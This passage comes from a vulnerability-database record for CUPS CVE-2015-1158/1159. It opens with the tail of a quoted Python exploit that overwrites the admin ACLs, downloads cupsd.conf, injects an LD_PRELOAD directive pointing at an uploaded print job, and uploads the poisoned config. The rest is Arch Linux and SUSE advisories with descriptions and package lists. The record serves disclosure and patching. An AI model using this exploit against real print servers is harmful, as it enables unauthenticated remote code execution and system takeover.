\n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x36\" # nwl \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x1b\" # val len: 27 \n\"\\x00\\x0b\" # length \n\"/admin/conf\" \n\"\\x00\\x0c\" \n\"BBBBBBBBBBBB\" \n\"\\x03\") # end of attributes \n \nhttp_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \nhttp_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \npretty(\"*\",\"stomping ACL\") \npretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp))) \ntime.sleep(1) \npretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp))) \n \nhttp_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"\\x0d\\x0a\") \npretty(\"*\",\"checking /admin\") \npretty(\"*\",\">:\\n\" + createDump(http_header_check)) \nres = txrx(rhost,rport,\"tcp\",http_header_check) \npretty(\"*\",\"<:\\n\" + createDump(res)) \nm = re.search('200 OK', res) \nif m is not None: \npretty(\"+\",\"ACL stomp successful\") \nelse: \npretty(\"-\",\"exploit failed\") \nexit(1) \n \n \ndef getConfig(rhost, rport): \ni = random.randint(1,1024) \noriginal_config = \"\" \nhttp_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \npretty(\"*\",\"grabbing configuration file....\") \nres = txrx(rhost,rport,\"tcp\",http_request) \nres_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\") \noriginal_config = res_array[1] \npretty(\"*\",\"config:\\n\" + original_config + \"\\n\") \nreturn original_config \n \ndef putConfig(rhost, rport, config): \nhttp_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Keep-Alive\\x0d\\x0a\" \n\"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \npretty(\"*\",\"overwriting config...\") \npretty(\"*\",\">:\\n\" + createDump(http_request + config)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config))) \n \ndef poisonConfig(config, name): \nconfig = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\" \nreturn config \n \ndef main(): \nrhost = None; \nnoshell = None; \noptions, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',]) \nfor opt, arg in options: \nif opt in ('-h', '--help'): \nusage() \nelif opt in ('-a','--rhost'): \nrhost = arg; \nelif opt in ('-b','--rport'): \nrport = arg; \nelif opt in ('-c','--lib'): \nlibpath = arg; \nelif opt in ('-f','--stomp-only'): \nnoshell = 1; \nbanner() \nif rhost is None or rport is None: \nusage() \npretty(\"*\",\"locate available printer\") \nprinter = locatePrinters(rhost, rport) \npretty(\"*\",\"stomp ACL\") \nstompACL(rhost, rport, printer) \nif (noshell is not None): \npretty(\"*\",\"fin\") \nexit(0) \npretty(\"*\",\"prepare payload\") \npayload = preparePayload(libpath) \npretty(\"*\",\"spray payload\") \njobid = seedTarget(rhost, rport, printer, payload) \npretty(\"*\",\"grab original config\") \nOG_config = getConfig(rhost, rport) \npretty(\"*\",\"generate poison config\") \nevil_config = poisonConfig(OG_config, jobid) \npretty(\"*\",\"upload poison config\") \nputConfig(rhost, rport, evil_config) \npretty(\"*\",\"fin\") \nexit(0); \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140920/cups-exec.txt"}], "archlinux": [{"lastseen": "2016-09-02T18:44:48", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1159", "https://bugs.archlinux.org/task/45279", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158", "https://www.cups.org/str.php?L4609"], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "2.0.3-1", "packageName": "cups", "arch": "any", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "- CVE-2015-1158 (arbitrary code execution, privilege escalation)\n\nAn issue with how localized strings are handled in cupsd allows a\nreference counter to over-decrement when handling certain print job\nrequest errors. As a result, an attacker can prematurely free an\narbitrary string of global scope, creating a dangling pointer to a\nrepurposed block of memory on the heap. The dangling pointer causes ACL\nverification to fail when parsing 'admin/conf' and 'admin' ACLs. The ACL\nhandling failure results in unrestricted access to privileged\noperations, allowing an unauthenticated remote user to upload a\nreplacement CUPS configuration file and mount further attacks.\n\n- CVE-2015-1159 (cross-side scripting)\n\nA cross-site scripting bug in the CUPS templating engine allows this bug\nto be exploited when a user browses the web. In certain cases, the CGI\ntemplate can echo user input to file rather than escaping the text\nfirst. This may be used to set up a reflected XSS attack in the QUERY\nparameter of the web interface help page. By default, many linux\ndistributions run with the web interface activated.", "reporter": "Arch Linux", "published": "2015-06-10T00:00:00", "title": "cups: multiple issues", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "archlinux", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-10T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-June/000343.html", "id": "ASA-201506-2", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:36:14", "references": ["https://bugzilla.suse.com/924208"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-libs-debuginfo", "packageFilename": "cups154-libs-debuginfo-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-debuginfo", "packageFilename": "cups154-debuginfo-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-filters-debuginfo", "packageFilename": "cups154-filters-debuginfo-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-libs-debuginfo", "packageFilename": "cups154-libs-debuginfo-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-client-debuginfo", "packageFilename": "cups154-client-debuginfo-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-debugsource", "packageFilename": "cups154-debugsource-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-debuginfo", "packageFilename": "cups154-debuginfo-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-filters", "packageFilename": "cups154-filters-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-libs", "packageFilename": "cups154-libs-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-filters-debuginfo", "packageFilename": "cups154-filters-debuginfo-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154", "packageFilename": "cups154-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-client-debuginfo", "packageFilename": "cups154-client-debuginfo-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154", "packageFilename": "cups154-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-libs", "packageFilename": "cups154-libs-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-client", "packageFilename": "cups154-client-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-debugsource", "packageFilename": "cups154-debugsource-1.5.4-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-client", "packageFilename": "cups154-client-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "packageName": "cups154-filters", "packageFilename": "cups154-filters-1.5.4-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "reporter": "Suse", "published": "2015-06-11T19:04:58", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "suse", "title": "Security update for cups154 (critical)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "modified": "2015-06-11T19:04:58", "id": "SUSE-SU-2015:1044-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00006.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:30:36", "references": ["https://bugzilla.suse.com/924208"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-client", "packageFilename": "cups-client-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-libs", "packageFilename": "cups-libs-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-ddk", "packageFilename": "cups-ddk-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-libs-debuginfo-32bit", "packageFilename": "cups-libs-debuginfo-32bit-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-ddk", "packageFilename": "cups-ddk-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-devel", "packageFilename": "cups-devel-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-ddk-debuginfo", "packageFilename": "cups-ddk-debuginfo-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-libs-32bit", "packageFilename": "cups-libs-32bit-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-libs-debuginfo", "packageFilename": "cups-libs-debuginfo-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-client-debuginfo", "packageFilename": "cups-client-debuginfo-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups", "packageFilename": "cups-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups", "packageFilename": "cups-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-libs-debuginfo", "packageFilename": "cups-libs-debuginfo-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-libs", "packageFilename": "cups-libs-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-libs-32bit", "packageFilename": "cups-libs-32bit-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-client-debuginfo", "packageFilename": "cups-client-debuginfo-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-client", "packageFilename": "cups-client-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-libs-debuginfo", "packageFilename": "cups-libs-debuginfo-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-libs-debuginfo-32bit", "packageFilename": "cups-libs-debuginfo-32bit-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-client-debuginfo", "packageFilename": "cups-client-debuginfo-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-ddk-debuginfo", "packageFilename": "cups-ddk-debuginfo-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-client-debuginfo", "packageFilename": "cups-client-debuginfo-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-libs-debuginfo", "packageFilename": "cups-libs-debuginfo-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-devel", "packageFilename": "cups-devel-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-libs", "packageFilename": "cups-libs-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-client", "packageFilename": "cups-client-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups", "packageFilename": "cups-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.5.4-12.20.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-ddk", "packageFilename": "cups-ddk-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-ddk", "packageFilename": "cups-ddk-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups", "packageFilename": "cups-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-devel", "packageFilename": "cups-devel-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-devel", "packageFilename": "cups-devel-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.5.4-12.20.1", "packageName": "cups-ddk-debuginfo", "packageFilename": "cups-ddk-debuginfo-1.5.4-12.20.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-ddk-debuginfo", "packageFilename": "cups-ddk-debuginfo-1.5.4-21.9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-client", "packageFilename": "cups-client-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "1.5.4-21.9.1", "packageName": "cups-libs", "packageFilename": "cups-libs-1.5.4-21.9.1.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "This update fixes the following issues:\n\n - CVE-2015-1158 and CVE-2015-1159 fixes a possible privilege escalation\n via cross-site scripting and bad print job submission used to replace\n cupsd.conf on server (CUPS STR#4609 CERT-VU-810572 CVE-2015-1158\n CVE-2015-1159 bugzilla.suse.com bsc#924208). In general it is crucial to\n limit access to CUPS to trustworthy users who do not misuse their\n permission to submit print jobs which means to upload arbitrary data\n onto the CUPS server, see\n <a rel=\"nofollow\" href=\"https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings\">https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings</a> and cf. the\n entries about CVE-2012-5519 below.\n\n", "edition": 1, "reporter": "Suse", "published": "2015-06-12T21:05:05", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "suse", "title": "Security update for cups (critical)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "modified": "2015-06-12T21:05:05", "id": "OPENSUSE-SU-2015:1056-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00010.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:47:49", "references": ["https://bugzilla.suse.com/924208"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-filters-debuginfo-1.5.4-9.1.s390x.rpm", "packageName": "cups154-filters-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-debugsource-1.5.4-9.1.s390x.rpm", "packageName": "cups154-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-client-1.5.4-9.1.s390x.rpm", "packageName": "cups154-client", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-filters-1.5.4-9.1.s390x.rpm", "packageName": "cups154-filters", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-libs-1.5.4-9.1.s390x.rpm", "packageName": "cups154-libs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-1.5.4-9.1.s390x.rpm", "packageName": "cups154", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-debuginfo-1.5.4-9.1.s390x.rpm", "packageName": "cups154-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-client-debuginfo-1.5.4-9.1.s390x.rpm", "packageName": "cups154-client-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Legacy Software", "OSVersion": "12", "packageVersion": "1.5.4-9.1", "arch": "s390x", "packageFilename": "cups154-libs-debuginfo-1.5.4-9.1.s390x.rpm", "packageName": "cups154-libs-debuginfo", "operator": "lt"}], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "reporter": "Suse", "published": "2015-06-11T20:06:22", "title": "Security update for cups154 (critical)", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "modified": "2015-06-11T20:06:22", "id": "SUSE-SU-2015:1044-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00008.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:26:30", "references": ["https://bugzilla.suse.com/924208"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debuginfo", "packageFilename": "cups-debuginfo-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-libs", "packageFilename": "cups-libs-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups", "packageFilename": "cups-1.7.5-9.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups", "packageFilename": "cups-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-client-debuginfo", "packageFilename": "cups-client-debuginfo-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-devel", "packageFilename": "cups-devel-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-client-debuginfo", "packageFilename": "cups-client-debuginfo-1.7.5-9.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "1.7.5-9.1", "packageName": "cups-debugsource", "packageFilename": "cups-debugsource-1.7.5-9.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux 